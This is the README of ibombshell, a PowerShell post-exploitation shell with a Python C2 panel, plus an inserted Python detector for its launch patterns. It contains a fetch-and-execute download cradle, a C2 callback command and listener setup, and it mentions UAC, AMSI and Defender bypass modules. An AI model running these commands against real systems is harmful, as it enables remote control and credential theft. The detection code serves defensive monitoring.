
Tool to deploy a post-exploitation prompt at any time


ibombshell - Dynamic Remote Shell

      ,--.!,    _ ____                  __   _____ __         ____
   __/   -*-   (_) __ )____  ____ ___  / /_ / ___// /_  ___  / / /
 ,d08b.  '|`  / / __  / __ \/ __ `__ \/ __ \\__ \/ __ \/ _ \/ / /
 0088MM      / / /_/ / /_/ / / / / / / /_/ /__/ / / / /  __/ / /
 `9MMP'     /_/_____/\____/_/ /_/ /_/_.___/____/_/ /_/\___/_/_/

 [+] Starting the console...
 [*] Console ready!

ibombshell is a tool written in PowerShell that gives you a prompt at any time with post-exploitation functionality (and in some cases exploitation). It is a shell that is downloaded directly to memory, providing access to a large number of pentesting features. These features can be downloaded directly to memory in the form of a PowerShell function. This form of execution is known as everywhere.

In addition, ibombshell provides a second execution mode called Silently, in which the pentester executes an instance of ibombshell (called a warrior). The compromised computer connects to a C2 panel over HTTP, so the warrior can be controlled and functions that help the pentester can be loaded into memory. This happens within the post-exploitation phase.

Prerequisites

To run ibombshell everywhere it is mandatory to have PowerShell 3.0 or higher. For operating systems other than Windows, you can read more about this in the PowerShell GitHub repository (PowerShell for every system!).

To run the ibombshell silently mode you need Python 3.6 and some Python libraries. You can install them with:

cd ibombshell\ c2/
pip install -r requirements.txt

Note: ibombshell C2 works with Python 3.X. Make sure you run the pip that belongs to this version.

Usage

ibombshell has two execution modes:

ibombshell everywhere

To load ibombshell simply run on PowerShell:

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Telefonica/ibombshell/master/console')

Now you can run the downloaded ibombshell console by running:

console

ibombshell everywhere in isolated environments

If you need to use ibombshell in isolated environments, you must prepare your computer first in a networked environment. Load all the functions you will need, and use savefunctions to save them in the Windows registry.

Now you can use this Base64 code to get ibombshell:


ibombshell silently mode

This version allows you to run the ibombshell console and remotely control it from the C2 panel written in Python. To run this version, first you must launch the console process in PowerShell:

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Telefonica/ibombshell/master/console')

From the ibombshell C2 path, prepare the C2:

python3 ibombshell.py

And create the listener where the warriors will connect:

iBombShell> load modules/listener.py
[+] Loading module...
[+] Module loaded!
iBombShell[modules/listener.py]> run

The default listener port is 8080. Finally you can launch the console in silently mode on the host to get remote control:

console -Silently -uriConsole http://[ip or domain]:[port]
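
For defenders, the launch patterns shown above (the in-memory download cradle, the Base64 command passed with -E, and console -Silently -uriConsole) all appear in process command-line or PowerShell script-block logs. The following Python detector is an added example, not part of the ibombshell project; the rule names, the sample command lines and the 203.0.113.10 address are constructed for illustration.

```python
import base64
import re

IEX = re.compile(r"\b(iex|invoke-expression)\b", re.I)
CRADLE = re.compile(r"\b(iex|invoke-expression)\b.*\bdownloadstring\b", re.I | re.S)
SILENT = re.compile(r"\bconsole\b.*-silently\b.*-uriconsole\s+\S+", re.I)
PARAM = re.compile(r"""[-/](\w+)\s+["']?([A-Za-z0-9+/=]{16,})""")
# PowerShell accepts any prefix of -EncodedCommand (-e, -enc, ...) plus the alias -ec.
ENC_NAMES = {"ec"} | {"encodedcommand"[:n] for n in range(1, 15)}


def decode_encoded_command(cmdline):
    """Return the script passed via -E/-EncodedCommand (base64 of UTF-16LE), or None."""
    for name, blob in PARAM.findall(cmdline):
        if name.lower() in ENC_NAMES:
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except ValueError:  # bad base64 or bad UTF-16: not a usable payload
                return None
    return None


def classify(cmdline):
    """Return the sorted names of the rules that fire on one process command line."""
    hits = set()
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.add("encoded-command")
        if IEX.search(decoded):
            hits.add("encoded-iex")
        text += "\n" + decoded  # also run the plain-text rules on the decoded script
    if CRADLE.search(text):
        hits.add("download-cradle")
    if SILENT.search(text):
        hits.add("silently-mode")
    return sorted(hits)


# Constructed sample command lines (203.0.113.0/24 is a documentation range).
ENCODED = base64.b64encode("$c | out-string | iex".encode("utf-16-le")).decode()
SAMPLES = [
    "powershell.exe -Command \"iex (new-object net.webclient).downloadstring('http://203.0.113.10/console')\"",
    "console -Silently -uriConsole http://203.0.113.10:8080",
    "powershell.exe -E " + ENCODED,
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
]

if __name__ == "__main__":
    print(*[(classify(s), s[:60]) for s in SAMPLES], sep="\n")
```

Feed it the command-line field of process-creation events or the text of script-block log entries; an empty list means no rule fired.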

ibombshell C2 scheme

The basic operation of the ibombshell control panel follows this scheme:

        ibombshell                 C2
            |                      |
            |    newibombshell     |
            +--------------------->| --+ register
            |                      |<--+ from IP
            |    get functions     |
            |   and instructions   |
            +--------------------->|
            |                      |
            |    send functions    |
            |   and instructions   |
execute +-- |<---------------------+
        +-->|                      |
            |       results        |
            +--------------------->|
            |                      |

Docker

We have created a Docker container with everything you need to make it work. Run these commands from the Dockerfile location:

sudo docker build -t "ibombshell" .
sudo docker run -it ibombshell

Example videos

Some example videos...

iBombShell: PoC Warrior + Bypass UAC + Pass the hash

iBombShell: macOS

iBombShell: PoC of use from macOS

ibombshell: Extracting Private SSH Keys on Windows 10

ibombshell: Module for extracting private SSH keys on Windows 10

iBombShell: PoC savefunctions

ibombshell - Silently bypass UAC Environment Injection

ibombshell - Silently mode for the UAC bypass Environment Injection

iBombShell - Mocking Trusted Directory

iBombShell - DLL generation

iBombShell - AMSI & Windows Defender Bypass

License

This project is licensed under the GNU General Public License. See the LICENSE file for details.

Contact

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. WHENEVER YOU MAKE A CONTRIBUTION TO A REPOSITORY CONTAINING NOTICE OF A LICENSE, YOU LICENSE YOUR CONTRIBUTION UNDER THE SAME TERMS, AND YOU AGREE THAT YOU HAVE THE RIGHT TO LICENSE YOUR CONTRIBUTION UNDER THOSE TERMS. IF YOU HAVE A SEPARATE AGREEMENT TO LICENSE YOUR CONTRIBUTIONS UNDER DIFFERENT TERMS, SUCH AS A CONTRIBUTOR LICENSE AGREEMENT, THAT AGREEMENT WILL SUPERSEDE.

This software doesn't have a QA Process. This software is a Proof of Concept.

If you have any problems, you can contact:

[email protected]
